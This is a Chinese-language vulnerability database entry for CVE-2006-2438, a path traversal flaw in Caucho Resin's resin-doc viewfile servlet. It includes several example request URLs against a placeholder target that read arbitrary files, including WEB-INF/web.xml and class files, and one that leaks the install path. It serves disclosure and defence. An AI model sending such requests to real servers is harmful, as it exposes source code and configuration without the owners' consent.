Caucho Resin viewfile程序组件 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1194974 漏洞类型 路径遍历
发布时间 2006-05-17 更新时间 2006-05-18
CVE编号 CVE-2006-2438 CNNVD-ID CNNVD-200605-330
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-330
|漏洞详情
Resin是一款由CauchoTechnology开发的WEB服务器,可使用在MicrosoftWindows操作系统下。Resin的某个CGI程序实现上存在输入验证漏洞,远程攻击者可能利用此漏洞读取Web主目录下的任意文件,包括JSP源码或类文件。默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件。该文档包含有用于在集成的手册中浏览文件的servlet:http://targetsystem/resin-doc/viewfile/?contextpath=%2Fresin-doc%2Fjmx%2Ftutorial%2Fbasic&servletpath=%2Findex.xtp&file=index.jsp&re-marker=&re-start=&re-end=#code-highlightviewfileservlet可以无需参数在Web主目录中浏览任意文件:http://targetsystem/resin-doc/viewfile/?file=index.jsp攻击者可以设置resin-doc外的上下文路径,读取其他Web主目录的任意文件:http://targetsystem/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml如果系统中安装了resin-doc就可能读取Web主目录中的所有文件,包括类文件,然后可以反编译这些文件浏览Java源代码:http://targetsystem/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class请求中错误的路径还会泄漏安装的绝对路径:Filenotfound/C:/customer/sites/deploy/n/wwwroot/WEB-INF/classes/com/webapp/app/non-existant.class
|参考资料

来源:BID
名称:18007
链接:http://www.securityfocus.com/bid/18007
来源:BUGTRAQ
名称:20060516ScanAlertSecurityAdvisory
链接:http://www.securityfocus.com/archive/1/434145
来源:VUPEN
名称:ADV-2006-1831
链接:http://www.frsirt.com/english/advisories/2006/1831
来源:XF
名称:resin-viewfile-file-disclosure(26494)
链接:http://xforce.iss.net/xforce/xfdb/26494
来源:OSVDB
名称:25571
链接:http://www.osvdb.org/25571
来源:SECTRACK
名称:1016110
链接:http://securitytracker.com/id?1016110
来源:SREASON
名称:908
链接:http://securityreason.com/securityalert/908
来源:SECUNIA
名称:20125
链接:http://secunia.com/advisories/20125
来源:FULLDISC
名称:20060516ScanAlertSecurityAdvisory
链接:http://archives.neohapsis.com/archives/fulldisclosure/2006-05/0384.html